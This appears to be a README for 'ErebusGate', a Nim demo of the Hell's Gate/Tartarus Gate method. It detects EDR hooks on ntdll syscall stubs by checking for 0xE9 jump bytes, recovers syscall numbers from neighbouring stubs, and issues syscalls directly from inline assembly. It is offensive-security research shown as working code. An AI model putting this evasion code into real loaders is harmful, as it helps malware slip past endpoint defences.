ErebusGate

A quick example of the Erebus Gate technique in Nim

Usage

Just compile the code

nim c -d=mingw --app=console --cpu=amd64 .\ErebusGate.nim

Demonstration

Check the the first byte and the third byte is 0xe9 to check whether they is hooked。

            # Classic hook API 
            # Check the the first byte is 0xe9
            elif cast[PBYTE](cast[ByteAddress](pFuncAddr))[] == 0xE9:
                for idx in countup(1,500):
                    if cast[PBYTE](cast[ByteAddress](pFuncAddr) + 3 + idx * UP)[] == 0xB8:
                        tableEntry.wSysCall = cast[PWORD](cast[ByteAddress](pFuncAddr) + 4 + (idx * UP))[] + cast[WORD](idx)
                        return true
                    if cast[PBYTE](cast[ByteAddress](pFuncAddr) + 3 + idx * DOWN)[] == 0xB8:
                        tableEntry.wSysCall = cast[PWORD](cast[ByteAddress](pFuncAddr) + 4 + (idx * DOWN))[] - cast[WORD](idx)
                        return true 
            # Tartarus gate from Nim
            # Check the the first three is 0xe9
            elif cast[PBYTE](cast[ByteAddress](pFuncAddr) + 3 )[] == 0xE9:
                for idx in countup(1,500):
                    if cast[PBYTE](cast[ByteAddress](pFuncAddr) + 3 + idx * UP)[] == 0xB8:
                        tableEntry.wSysCall = cast[PWORD](cast[ByteAddress](pFuncAddr) + 4 + (idx * UP))[] + cast[WORD](idx)
                        return true
                    if cast[PBYTE](cast[ByteAddress](pFuncAddr) + 3 + idx * DOWN)[] == 0xB8:
                        tableEntry.wSysCall = cast[PWORD](cast[ByteAddress](pFuncAddr) + 4 + (idx * DOWN))[] - cast[WORD](idx)
                        return true  

Perform "obfuscation" syscall on ASM commands。

asm """
        nop
        mov r10, rcx
        nop
        mov eax, `syscall`
        nop
        syscall
        ret
    """

References

A large number of research results come from HellsGateNim